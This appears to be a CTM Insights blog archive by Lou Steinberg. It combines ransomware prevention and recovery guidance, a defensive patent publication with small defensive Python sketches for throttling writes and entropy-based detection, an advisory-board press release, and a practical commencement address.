Not a week goes by without someone responding “Ransomware?  What should I do about Ransomware?”  For those lucky enough to have avoided this worry, ransomware is a type of computer attack in which extortionists encrypt the data on your computer, demanding payment to return access to your own files.  Many attacks are combined with a threat to make sensitive data public if payment isn’t received.

My stock answer is a list of controls, starting with “make frequent backups and test them”.  For those who want to do more, I rattle off a list based on their company’s technology maturity.

Having done this frequently, I thought it time to capture my “best practices for preventing ransomware” list.  This is a list of good, better, and best cumulative controls that companies can check themselves against…all of which have a role to play in preventing an initial attack, minimizing impact, and recovering from damage done.  Many help with other types of cyber attacks, even though the focus here is ransomware.  I know that others will have tools and techniques they favor or may prioritize things differently; this list is my opinion of how I view the controls landscape at this moment in time.  I’m publishing it to offer one person’s plain English guidance to those worried that they might not be doing enough (with tech details and keywords in parentheses in case you want to learn more).  Finally, I will caution that just because a tool is implemented doesn’t mean it’s working well, and that no system will stop all threats. 

I hope this gives comfort to those who have a solid set of defenses and ideas to everyone else. 

 

Best practices for preventing and mitigating ransomware attacks

 

Identify

Good

  • Create and update an inventory of critical systems and services to monitor

Better

  • Discover newly added internal systems and services, alert if unexpected

  • Discover newly added cloud systems and services, alert if unexpected

Best

  • Discover sensitive data both internally (servers, desktop files, etc) and in cloud storage, alert if unexpected

 

Prevent

Good

  • Tools and services that block malicious links in emails (web proxies, URL link protection)

  • Significant patches applied in a timely manner based on system criticality and connectivity to other systems (“criticality” is defined as providing critical functions or holding sensitive or important data)

  • Checking and enforcing passwords for minimum complexity

  • Two Factor Authentication (2FA or MFA) when logging into high-risk or Internet facing systems and applications, including those hosted in the cloud.

  • Vulnerability management: monthly scans to discover and remediate material vulnerabilities on both internal and external facing systems (prioritized by vulnerability “CVSS” score and system criticality)

Better

  • Regular (e.g. annual) training of users on best-practice security behaviors

  • Internal firewalls to limit connectivity between systems with similar functions like desktops (east-west firewalls) and systems with different functions (north-south firewalls)

  • Only granting users and software the minimum permissions necessary to operate (least privileged policy)

  • 3rd party penetration tests and internal “red team” attempts to exploit vulnerabilities

Best

  • Threat actor capability modeling (e.g. ATT&CK framework), mapped against defenses

  • User awareness testing (e.g. internal phishing campaigns, USB drop tests)

Detect

Good

  • Logging and logfile monitoring and alerting for unexpected behavior

  • Monitoring and replacing end of life hardware and software (inventory lifecycle management)

  • Signature based antivirus/malware scans of servers, desktops, and mobile

Better

  • Behavior monitoring and analytics of both users and software/services, with alerting

Best

  • Security Operations Center (SOC), monitoring for incidents

 

Respond

Good

  • Alerting and blocking data movement (exfiltration) based on volume and destination (Data Loss Prevention)

Better

  • Predefined policies and run books, describing actions for different types of incidents. These must be printed or on a system not connected to your network so they can be accessed when systems are compromised

Best

  • Data classification, with alerting and blocking unauthorized movement of sensitive data across internal and external boundaries (Data Loss Prevention)

  • Automated scripts that implement predefined runbooks in response to incidents

  • Tools to rapidly isolate or quarantine suspect systems

  • Tools to throttle CPU, network, and storage bandwidth on suspect systems

  • Pre-built tools to partition networks, limiting the spread of potential infections (submarine doors)

Recover

Good

  • Daily or continuous backups of all critical systems, regularly tested

  • Pre-defined breach notification plan

  • Pre-identified forensic capabilities, using internal resources or external vendors

Better

  • Cyber insurance

Best

  • Regular scans of the “dark net” looking for stolen data

 

What if you’ve become a victim already?

Maybe you implemented controls, maybe some were lacking.  Once you are a victim, here’s what I’d recommend:

Do

  • Immediately remove suspect systems from your network so the infection can’t spread

  • If you see lots of disk drive activity, or believe that files are still being encrypted, power the system off as quickly as possible.

  • Test your backups, if you have them.  This will let you know if you have the ability to recover.

  • Engage a cybersecurity forensics team (if you have cyber or business interruption insurance and don’t have the skill in-house, your insurance company may have recommendations).

  • Check legitimate ransomware decryption sites (e.g. https://nomoreransom.org ) to see if your files can be recovered.  Your antivirus vendor may be able to help as well.

  • Have the forensics team determine how they got in and remediate vulnerabilities.  Also have them scan for other infected systems.  A best practice is to wipe or replace as much of your compromised network gear and systems as possible.

Don’t

  • Assume the bad actors only compromised the systems you know they were on.  Unless you are certain a system wasn’t compromised, assume it was.

  • Assume that if you pay a ransom you will get your files back.  You might, but you are trusting people who just held you hostage.  You might also encourage future extortion if you pay.

  • Download ransomware removal or decryption tools from untrusted sources.  You don’t want to make things worse.

  • Hire a company that claims they will crack the encryption unless you know they are legitimate.  Some companies that charge to do this actually pay the ransom and pocket the difference.

Giving away Ransomware IP

I will be the first to say that what follows is an unusual blog. A year ago, CTM filed a provisional patent on a new way to detect and mitigate ransomware. Today, I am not only letting the application expire, I’m publishing the provisional document so that neither I nor anyone else can patent the concepts.

Why? Because this needs to exist, and the best way to enable that is to make the idea freely available. To anyone. It’s called a defensive publication; by placing the idea in the public domain, nobody can claim it. Including me.

A provisional patent simply stakes a claim at a point in time. It doesn’t necessarily fully flesh out the concept. It doesn’t get reviewed. It’s a way to say that you are claiming an idea, and gives the author a year to work out details and apply for a full patent. Today is 1 year.

The problem I noticed with ransomware was that most people focus on preventative controls like patching and firewalls to stop lateral movement before an attacker gets a foothold. They also (correctly) focus on controls like backups to help recover after an incident. What was missing was a way to limit the damage during an active attack. Kind of a preventative control in the moment.

Ransomware often goes through 3 distinct phases. In phase 1, an initial system is compromised, often because a user clicked on a malicious link or file, or because of an unpatched vulnerability in an internet-facing system. In phase 2, the ransomware attempts to quietly spread, moving stealthily to preposition itself on as many systems as possible before it activates. In this phase, it may exploit very different vulnerabilities than the one it used in phase 1. In phase 3, all deployed instances of ransomware activate simultaneously. At that point, it’s often too late to contain (assuming it spread in phase 2) and it’s now a race to shut off infected systems while they are busy being encrypted.

Phase 3 is generally “noisy”, with the malware trying to encrypt as many files as possible before being stopped. Modern ransomware prioritizes the files most likely to be valuable, so even if interrupted it’s likely too late. The number of systems plus the sheer speed of data loss overwhelms the ability to stop it. Networks are unplugged to limit any further phase 2 spread, and infected machines shut down, but generally too late.

In its need to go quickly lies an opportunity. Ransomware should be detectable by its noisy behavior. We can certainly monitor for large numbers of files being opened, encrypted, and written back to disk. We can look for changes in entropy as well. Why not use that as a trigger to limit the damage? Most people say the issue is false alarms; automatically shutting the machine down just because it’s behaving unusually risks real damage if we guess wrong. Not worth the risk of stopping something like a server that isn’t infected.

What if we don’t stop it? Our first big idea was to slow writes to the disk when we think ransomware might be active in phase 3. We can implement a delay in the storage device driver. We never stop the system, and reads are unaffected, but incrementally slowing writes while notifying an administrator limits the damage and buys time to check things out. If we trigger in error, the machine runs slowly for a little bit, but it keeps running.

Implementing this in the storage device driver has several other benefits. It’s a natural place to watch for read and write behavior system-wide, so it doesn’t rely on individual process monitoring (which is easily defeated by running a large number of malware processes, none of which individually trips a threshold). It’s also hard for malware to disable the storage driver without rebooting the machine, which we would notice.
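Here is a rough user-space sketch of the "slow, don't stop" idea. A real implementation would live in the storage device driver; this just simulates an escalating write delay once write volume crosses an arbitrary, illustrative threshold.

    # User-space simulation of incremental write throttling. A real version would
    # sit in the storage device driver; thresholds and delays here are illustrative.
    import time

    class ThrottledWriter:
        def __init__(self, suspicion_threshold=1000, base_delay=0.01):
            self.writes = 0
            self.threshold = suspicion_threshold   # writes observed before throttling begins
            self.delay = base_delay                # starting delay; grows if nobody intervenes

        def write(self, fh, data):
            self.writes += 1
            if self.writes > self.threshold:
                time.sleep(self.delay)             # reads stay fast; only writes slow down
                self.delay *= 1.1                  # escalate until an administrator checks in
                # a real system would also notify an administrator here
            fh.write(data)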

The second big idea was to use the order of operations to help fine tune ransomware detection. At the file level, the behavior is deterministic in that an encrypted file can’t be written or deleted before an unencrypted version is read. Leveraging this understanding further reduces the probability of a false trigger.
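The sketch below shows how that ordering could feed a score: a high-entropy write of a file that was recently read scores higher than either signal alone. The thresholds and weights are made up for illustration.

    # Illustrative sequence-aware scoring: read -> high-entropy write of the same
    # file is a stronger ransomware signal than either event by itself.
    import math
    from collections import Counter

    def entropy(data):
        counts = Counter(data)
        return -sum((c / len(data)) * math.log2(c / len(data)) for c in counts.values())

    recent_reads = set()

    def score_event(op, path, data=b""):
        if op == "read":
            recent_reads.add(path)
            return 0
        if op == "write" and data and entropy(data) > 7.5:     # near-random bytes
            return 3 if path in recent_reads else 1            # sequence boosts the score
        return 0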

So that’s it. What follows is the original provisional that was filed. The form may be something only a patent examiner would love, but I’m replicating it here without change to ensure zero ambiguity.

Anyone who wants to implement these ideas can do so knowing that I have explicitly relinquished any claims to them. Improving our ability to stop ransomware is far more important than my having another patent in my portfolio. If you are a developer, feel free to take it from here.

/lou

System and Methods for Establishing a Sequence-Based Approach to Ransomware Detection

Background

As noted in US Patent Application Number 20190228153 by Scaife, et al. (Scaife), it is desirable to detect ransomware by monitoring its behavior. All ransomware must by its nature read files, process them through means like encryption, and write the results. The results must either overwrite the original file or delete it to deny the legitimate owner access to unencrypted data. This fundamental behavior of ransomware, necessary to achieve its objectives of denying legitimate access to files, can be adjusted but not materially changed, which creates an opportunity for real time detection and blocking before substantial damage is done.

As the use of ransomware has increased in popularity by bad actors, the need for such defenses is apparent.

The approach referenced in the Scaife Application has several shortcomings, which permit ransomware opportunities to avoid detection. The existing approach taught and disclosed focuses on the behavior of each process running on a computer.  Scaife defines a process as an instance of computer code. Those creating ransomware software can seek to avoid detection by simply creating many small processes, none of which behave in a manner to sufficiently trigger detection by exceeding a preset threshold or malware score. In the aggregate, however, they collectively achieve their purpose.

Additionally, the existing approach scores activity attributes (such as reading files, increasing system entropy, and writing files) without regard to their sequence. As a ransomware file cannot be written before it is modified (through encryption or other means), and cannot be encrypted before it is read, a better method of detection with reduced false alarms would be to score the sequence of events instead of, or in addition to, their discrete activities.

Malware creators, including those creating ransomware, have demonstrated that they will evolve their software to evade detection. It is therefore reasonable to assume that process-based attribute scoring will be rendered less effective by simple changes to ransomware. This creates a need for an improved solution.

Further, US Patent application 20180157834 of Continella et al (Continella) combines detection with transparent file recovery by replacing potentially compromised files.  Unfortunately, this may result in additional storage requirements for "shadow copies" and/or legitimate changes being replaced and lost.  In doing so, Continella may increase costs and/or harm the correct operation of the system.  A method which reduces potential harm but does not create new issues or increase storage costs by copying and/or replacing legitimately modified files is therefore needed.

Finally, it is always desirable to reduce "false alarms" in any detection system.  False alarms distract users from other activities and can, when followed by an action to remediate, create new issues.  Therefore, methods to better score and detect legitimate issues while reducing false alarms are needed.


Detailed Description

As noted above, the Scaife approach includes detecting an instance of a malware process by scoring the behavior of said process using a combination of attributes.  An easy way to avoid detection would be to create many small processes that each, individually, limit their activity to a level that does not meet the threshold of a test.  The present disclosure proposes a method of looking at the combined behavior of all processes simultaneously.  Using this method, an infected system will still be detected even when many small malware processes are run.  This might, for example, be done by inserting software at the storage "device driver" layer that observes all read and write activity regardless of process.

It is also important to note that reacting to a detected event is critical to minimize harm.  The Scaife approach envisions simply stopping ("dropping") a suspect process.  Such an action can cause issues with legitimate processes which are not permitted to run and can be even more harmful if full system activity is being stopped; many operating systems will fail if they are suddenly stopped from accessing storage.  Instead, the present disclosure implements a system that slows all system access to its storage, whether directly attached or via a network.  Slowing access, particularly write access, allows the system to continue to operate (at an intentionally degraded level).  This minimizes the rate of damage and allows a legitimate administrator time to be notified of the detected issue and to intervene if necessary.  In one embodiment, the added performance delays may be increased if no action is taken to affirm that the system is running as expected or if additional and repeated behavior is observed.  This effectively slows the performance more, in preferred embodiments when writing, should an administrator not intervene.   

Additionally, while the approaches in Scaife and Continella may include using a collection of behavioral attributes individually or in combination to detect ransomware, neither leverages the sequence in which those attributes are invoked as a part of developing a behavioral score to test.  For example, a system that writes a number of files and then later reads them is unlikely to be ransomware, since ransomware read operations necessarily predate encrypting, which predates writing.  Bulk operations and caching may appear to skew this to some extent, but the fundamental order of operations is dictated by the malicious behavior of the ransomware.  As such, the sequence, or order, of operations may be used to score the likelihood of ransomware activity and reduce false alarms.  As a result, the present disclosure provides a distinct difference from previous approaches and solutions to ransomware detection and mitigation by proposing to look at system behavior (e.g., a collection of processes) versus individual processes, potentially scoring behavior based on the sequence of operations, and slowing versus stopping the system behavior on suspect systems as well as mitigating or eliminating the need for a transparent file recovery and file replacement mechanism.   

The following describes one or more of the elements that may be included in any embodiment based on the present disclosure.  The embodiments may include, but are not limited to, computer systems, network devices, mobile and wireless devices, including phones, tablets, computers  and the like.

1)    Detection of ransomware based on the behavior of a computer system over a period of time, whether that behavior is the result of a single process or a collection of processes.  

2)    Monitoring the volumes of individual behaviors at the system level, with some or all of the behaviors being scored and thresholded.  Examples of behaviors associated with ransomware that increase the score to be tested include a large number of: file reads and writes, file deletion or renaming, high CPU, changes in file type or magic number or file entropy.

3)    In some embodiments, the score may be further increased or affected by the sequence in which some or all of the individual behaviors is detected.

4)    Incrementally slowing a system once ransomware is suspected, to minimize harm until the system can be checked. 

5)    In some embodiments, access to file writes may specifically be incrementally slowed.

Janet Levesque joins CTM's Board of Advisors

JANET LEVESQUE JOINS CTM INSIGHTS ADVISORY BOARD

JULY 18, 2020, YORKTOWN HEIGHTS, N.Y. - CTM Insights, llc ("CTM"), a leading cybersecurity research lab and build studio, announced the appointment of Janet Levesque to its Advisory Board.  Levesque fills the seat previously held by Bob Lam, who stepped down to run CTM portfolio company ShardSecure.  Levesque joins other industry luminaries who help guide the investment and operational strategies of CTM's portfolio.  As the former CIO and Data Protection Officer of Mimecast and CISO at RSA, Janet brings a wealth of experience managing current and future cybersecurity risk.

"Cyber adversaries are constantly improving their capabilities, sometimes dramatically," said Levesque.  "CTM is different from other investors and vendors.  They look for the hard problems that will cause real pain, and invest in completely new approaches to solving them.  I'm thrilled to join other world-class advisors that help shape CTM’s approach.”

“Janet has built some of the best, forward thinking cyber security programs anywhere.  She’s both a designer and a practitioner, two skills I deeply respect.  I’m pleased to welcome Janet to the Board and look forward to working with her," said Lou Steinberg, Founder and Managing Partner of CTM.  "I also want to thank Bob for his guidance and wish him great success as CEO of ShardSecure."   

CTM’s ongoing initiatives include ways to limit the damage caused by ransomware, secure data without encryption, stop fraud and eliminate customer challenges through frictionless transaction authorization, and a trust overlay for the Internet.   New research includes creating a method for the efficient detection of attacks against data integrity, such as deep fakes.

About CTM

CTM invests in radically new approaches to solve some of the hardest problems in cyber, providing seed funding and resources to turn them into companies.  In just two years, investments have been made in six "big ideas" which have already resulted in four pending patents and the launch of two companies, Authoriti and ShardSecure, creating a combined IRR of over 200%.

 

A practical commencement address for making smart choices

Like many parents, I have kids who will graduate from their respective schools during this period of COVID-19 uncertainty (Tim from grad school and Becky from high school).  Neither knows if or when they will have a formal commencement ceremony.  That got me thinking about the many commencements I’ve attended over the years; some were entertaining, others just long, but few featured speakers with useful insights. 

In light of this, I decided to offer the commencement keynote I wish I had received.  No lofty platitudes, just eight bits of practical advice for navigating the future.  These are things that I had to figure out for myself in the decades since my own graduations.

1)      Be an exception.  You want an exceptional set of opportunities?  An exceptional career?  Most places are designed to efficiently handle a large group of requests the same way, whether the task is approval to move ahead with a project, manage a budget, hire talent, give a promotion, etc.  You can try to circumvent the process when it doesn’t make sense, but that’s not a great idea.  Instead, find a reason that your case is an exception.  Once you are in an exception category, you can get almost anything done that’s reasonable.

2)      You get the job you are doing.  If you want a promotion or a great new assignment, prove you are up to it.  Volunteer to assist, invest some effort, and demonstrate your ability.  That’s far more effective than just asking to be given something.  As Edison once said, “don’t be afraid to earn more than you are paid.”  Earn the job and it will be given to you.

3)      You get what you measure.  As your career progresses, you will find that people pay the most attention to things that are inspected by others.  Create a consistent set of metrics around the “critical few” things that matter most because they have a disproportionate effect on the outcomes you seek.   That also means your metrics have to be balanced so you don’t succeed in one area at the expense of something equally important.  Measure constantly and publicly.  People will focus on what is measured. 

4)      Take risks when the cost of failure is low.  Every decision involves some kind of risk, so take the biggest risks (with the most upside potential) when your downside is limited.  I left a good job and started a company at a time when I knew I could get another job if needed.  It’s also worth remembering that risks accumulate, so if you are taking a lot of risk in one area, don’t simultaneously take risk elsewhere.

5)      Time is the enemy.  There will always be competitors, but they are just competition.  Your enemy is time.  Efforts that take a long time allow other things around them to change— business priorities shift, people take on new roles, economies rise and fall.  If you don’t have a sense of urgency and execute while the conditions are right, the conditions will change.  A boss of mine used to say “the longer it takes, the longer it will take.”

6)      People who can’t communicate work for people who can.  This is extremely important.  Learn the art of public speaking.  Learn to organize your thoughts with mind maps and write clearly.  Avoid jargon and use analogies when communicating with people who don’t deeply know your space.   Join Toastmasters.  Read Tufte’s books.  Learn the art of communicating to others.

7)      Life is long and your industry small.  Be nice to people.  You may meet them again, and they will remember whether you cared about them and their challenges – or just yourself.

8)      Make smart choices.  This neatly summarizes the seven things before it.  Life is a series of choices and consequences.   Sometimes people express this as “you make your own luck.”  It’s true.  Understand the likely (longer-term) outcomes from your actions and decisions, vs. focusing on just the immediate result.  You influence your outcomes far more than you think.

That’s it.  No lofty visions, no inspirational platitudes.  Instead, you have eight bits of practical advice that can be applied throughout all aspects of your life and career.  It took me 35 years to find and distill these, so you just got a 35-year head start.  Use it to do something great.  Make smart choices.

Lou Steinberg is Founder & Managing Partner of CTM Insights, a cybersecurity research lab and early stage incubator